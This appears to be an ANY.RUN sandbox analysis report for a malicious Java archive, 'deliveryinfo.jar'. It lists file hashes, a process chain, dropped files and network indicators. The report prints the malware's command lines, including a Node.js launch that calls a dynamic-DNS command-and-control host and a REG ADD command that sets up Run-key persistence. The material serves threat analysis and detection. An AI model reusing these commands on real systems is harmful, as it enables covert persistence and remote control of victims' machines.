
deliveryinfo.jar

Full analysis: https://app.any.run/tasks/54eefd28-e707-4a1f-b45d-9dee8f2f2f89
Verdict: Malicious activity
Analysis date: September 30, 2020, 03:23:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/java-archive
File info: Java archive data (JAR)
MD5: 724141C6922AB8E19C262D269AA8AEE1
SHA1: 0D2BF53FA5138AA22B1585F5C5093DFBE65DFCD0
SHA256: A3B9D353EF66B0E9F9920E9F4D520E67E40F9F8AC855EDF42BFA3BE4492FCF1D
SSDEEP: 12288:whSM3uQPBuy9mwsG+BXT4zsvuXEAr/qWy5khwG/:whSUuQpBxsG+NT4dXrriWGSH/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Changes the autorun value in the registry
      • reg.exe (PID: 3420)
  • SUSPICIOUS
    • Application launched itself
      • javaw.exe (PID: 2280)
      • node.exe (PID: 3968)
      • node.exe (PID: 1208)
    • Executes JAVA applets
      • javaw.exe (PID: 2280)
    • Executable content was dropped or overwritten
      • javaw.exe (PID: 572)
    • Creates files in the user directory
      • javaw.exe (PID: 572)
    • Reads CPU info
      • node.exe (PID: 2932)
    • Uses REG.EXE to modify Windows registry
      • cmd.exe (PID: 3996)
    • Starts CMD.EXE for commands execution
      • node.exe (PID: 2932)
  • INFO
    • Dropped object may contain Bitcoin addresses
      • javaw.exe (PID: 572)
No Malware configuration.

TRiD

.jar | Java Archive (78.3)
.zip | ZIP compressed archive (21.6)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0808
ZipCompression: Deflated
ZipModifyDate: 2020:09:25 16:24:26
ZipCRC: 0x00000000
ZipCompressedSize: 2
ZipUncompressedSize: -
ZipFileName: META-INF/
Total processes: 42
Monitored processes: 7
Malicious processes: 0
Suspicious processes: 5

Behavior graph

Graph nodes (process chain; details in the full report): javaw.exe, javaw.exe, node.exe, node.exe, node.exe, cmd.exe, reg.exe

Process information

PID 2280 | javaw.exe | Parent process: explorer.exe
  CMD: "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\deliveryinfo.jar"
  Path: C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe
  User: admin
  Company: Oracle Corporation
  Integrity Level: MEDIUM
  Description: Java(TM) Platform SE binary
  Exit code: 0
  Version: 8.0.920.14

PID 572 | javaw.exe | Parent process: javaw.exe
  CMD: "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar C:\Users\admin\AppData\Local\Temp\4e5716af.tmp
  Path: C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe
  User: admin
  Company: Oracle Corporation
  Integrity Level: MEDIUM
  Description: Java(TM) Platform SE binary
  Exit code: 0
  Version: 8.0.920.14

PID 3968 | node.exe | Parent process: javaw.exe
  CMD: C:\Users\admin\node-v14.12.0-win-x86\node.exe - --hub-domain hazeman222.duckdns.org
  Path: C:\Users\admin\node-v14.12.0-win-x86\node.exe
  User: admin
  Company: Node.js
  Integrity Level: MEDIUM
  Description: Node.js: Server-side JavaScript
  Exit code: 0
  Version: 14.12.0

PID 1208 | node.exe | Parent process: node.exe
  CMD: C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.org
  Path: C:\Users\admin\node-v14.12.0-win-x86\node.exe
  User: admin
  Company: Node.js
  Integrity Level: MEDIUM
  Description: Node.js: Server-side JavaScript
  Exit code: -
  Version: 14.12.0

PID 2932 | node.exe | Parent process: node.exe
  CMD: C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.org
  Path: C:\Users\admin\node-v14.12.0-win-x86\node.exe
  User: admin
  Company: Node.js
  Integrity Level: MEDIUM
  Description: Node.js: Server-side JavaScript
  Exit code: -
  Version: 14.12.0

PID 3996 | cmd.exe | Parent process: node.exe
  CMD: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e8529f2a-975c-451b-9760-2a0bb1500d9d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\"""
  Path: C:\Windows\system32\cmd.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows Command Processor
  Exit code: 0
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 3420 | reg.exe | Parent process: cmd.exe
  CMD: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e8529f2a-975c-451b-9760-2a0bb1500d9d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\""
  Path: C:\Windows\system32\reg.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Registry Console Tool
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 39
Read events: 38
Write events: 1
Delete events: 0

Modification events

PID 3420 | reg.exe
  Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  Operation: write
  Name: e8529f2a-975c-451b-9760-2a0bb1500d9d
  Value: cmd /D /C "C:\Users\admin\qhub\node\2.0.10\boot.vbs"
Executable files: 2
Suspicious files: 2
Text files: 3 597
Unknown types: 7

Dropped files

PID 572 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node.exe | Type: -
  MD5: -
  SHA256: -
PID 2280 | javaw.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | Type: text
  MD5: A60F0E34D8C3555E66C3B82E3E190E95
  SHA256: 56F928ACE68645241E155C043C89E011F0562C3AF92B00B56E392792B4C4ACE9
PID 572 | javaw.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | Type: text
  MD5: B5F695B7ED72F26866D96972FCCCFB88
  SHA256: C93AAE75B3445164FDDF214D051529A2A12914A4B3A4604CF73CEAF5ACBBC32B
PID 2280 | javaw.exe | C:\Users\admin\AppData\Local\Temp\4e5716af.tmp | Type: java
  MD5: 724141C6922AB8E19C262D269AA8AEE1
  SHA256: A3B9D353EF66B0E9F9920E9F4D520E67E40F9F8AC855EDF42BFA3BE4492FCF1D
PID 572 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node_modules\npm\bin\npm.cmd | Type: text
  MD5: D5B5ACB61C9BF69FB8BFC65EBA28C6AB
  SHA256: AFA68B96334EA8493BCB908743AF3DBD619CF26BE7B44460179ABD4D75D849D2
PID 572 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\nodevars.bat | Type: text
  MD5: E6636C5B093F5CC13DFB7508305B8D8B
  SHA256: A2B020E2F641524C6FD1B8EBBCD9EE03C7DC44009F2B78E701E773AD048BE9A5
PID 572 | javaw.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\83aa4cc77f591dfc2374580bbd95f6ba_90059c37-1320-41a4-b58d-2b75a9850d2f | Type: dbf
  MD5: C8366AE350E7019AEFC9D1E6E6A498C6
  SHA256: 11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
PID 572 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node_modules\npm\.mailmap | Type: text
  MD5: 50FF5F4745B5210D1DDC6CB3AD21216B
  SHA256: EC219650D5ED44D58B1F6CD6E8CCC116E118D7569E09ED19E9B80F5C8BE87D5B
PID 572 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\CHANGELOG.md | Type: html
  MD5: 5F15C768C60610B0F12C9BDE18D5EF36
  SHA256: 5025CB1E5A255FB05B0E1263BE2AE9652EC95B0D380FCEBF88863E8BADF1B894
PID 572 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\LICENSE | Type: text
  MD5: A249503208BA72F4ABC790A08C1025C5
  SHA256: 6C351F95A850B485A662E8B43003D8CA56CD663BE625981D7203A05D2CF587E0
HTTP(S) requests: 0
TCP/UDP connections: 6
DNS requests: 3
Threats: 0

HTTP requests

No HTTP requests

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3968 | node.exe | 94.156.189.108:443 | hazeman222.duckdns.org | BelCloud Hosting Corporation | BG | unknown
2932 | node.exe | 94.156.189.108:443 | hazeman222.duckdns.org | BelCloud Hosting Corporation | BG | unknown
572 | javaw.exe | 104.20.22.46:443 | nodejs.org | Cloudflare Inc | US | shared
2932 | node.exe | 95.217.228.176:443 | wtfismyip.com | Hetzner Online GmbH | DE | malicious

DNS requests

Domain | IP | Reputation
nodejs.org | 104.20.22.46, 104.20.23.46 | whitelisted
hazeman222.duckdns.org | 94.156.189.108 | malicious
wtfismyip.com | 95.217.228.176 | shared

Threats

PID | Process | Class | Message
- | - | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2 ETPRO signatures available at the full report
No debug info